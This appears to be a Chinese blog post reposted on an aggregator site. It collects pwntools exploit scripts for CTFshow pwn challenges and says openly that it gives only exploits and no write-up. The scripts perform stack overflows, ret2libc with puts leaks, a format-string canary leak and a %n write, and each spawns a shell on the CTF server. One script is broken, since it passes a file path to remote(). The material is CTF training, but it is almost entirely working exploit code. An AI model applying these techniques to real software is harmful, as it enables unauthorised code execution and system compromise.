CTFshow——Pwn(1)

有點懶不想寫write up了。只有exploit。

PWN簽到題

from pwn import * p = remote('xxx',xxx) p.interactive()

pwn02

from pwn import * p =remote("pwn.chall.ctf.show",28006) p.sendline('a'*(0x9+4) + p32(0x0804850F)) p.interactive()

pwn03

from pwn import * from LibcSearcher import * p = remote("pwn.chall.ctf.show",28063) elf = ELF('./stack1') puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main = 0x080484DF payload = 'a' * (9 + 4) + p32(puts_plt) + p32(main) + p32(puts_got) p.recv() p.sendline(payload) puts_addr = u32(p.recv(4))libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') system = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh')payload = 'a' * (9 + 4) + p32(system) + p32(main) + p32(binsh) p.recv() p.sendline(payload) p.interactive()

pwn04

from pwn import * #p = process('./ex2') p =remote("pwn.chall.ctf.show",28190) p.recv() leak_canary = "%31$x" p.sendline(leak_canary) canary = int(p.recv(),16) print(hex(canary)) getshell = "a" * 100 + p32(canary) + "b" * 12 + p32(0x0804859B) p.sendline(getshell) p.interactive()

pwn05

from pwn import * p = remote("pwn.chall.ctf.show",28041) flag = 0x08048486 payload = 'a' * (0x14 + 4) + p32(flag) p.sendline(payload) p.interactive()

pwn06

glibc2.27版本以上需要棧平衡。rsp % 0x10 == 0.所以加了一個ret保證堆棧平衡。

from pwn import * #p =remote("pwn.chall.ctf.show",28012) p = remote('./pwn (1)') gdb.attach(p, 'b *0x00000000004005B4') payload = 'a' * (0xc + 8) + p64(0x0400577) + p64(0x0400577) p.sendline(payload) p.interactive()

pwn07

from pwn import * from LibcSearcher import * elf = ELF('./pwn') p = remote('pwn.chall.ctf.show',28081) puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] main = elf.symbols['main'] pop_rdi = 0x00000000004006e3 ret = 0x00000000004004c6 payload = 'a' * (0xc + 0x8) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)p.sendline(payload) p.recvline() puts_addr = u64(p.recvuntil('\n')[:-1].ljust(8,'\0'))libc = LibcSearcher('puts', puts_addr) libc_base = puts_addr - libc.dump('puts') system = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh')payload = 'a' * (0xc + 0x8) + p64(ret) +p64(pop_rdi) + p64(binsh) + p64(system) p.sendline(payload) p.interactive()

01棧溢出之ret2text

from pwn import * p =remote('pwn.chall.ctf.show',28135) ret = 0x00000000004004fe payload = 'a' * (0x80 + 8) + p64(ret) +p64(0x000000000400637) p.sendline(payload) p.interactive()

pwn10

from pwn import * p = remote('pwn.chall.ctf.show',28120) num_addr = 0x0804A030 payload = p32(num_addr) + '%12c%7$n' p.sendline(payload) p.interactive()

2a1

# 20.21.2.24還沒搞出來。hhhh明天再看看有點困啊 與50位技術專家面對面20年技術見證，附贈技術全景圖

總結

以上是生活随笔為你收集整理的CTFshow——Pwn(1)的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。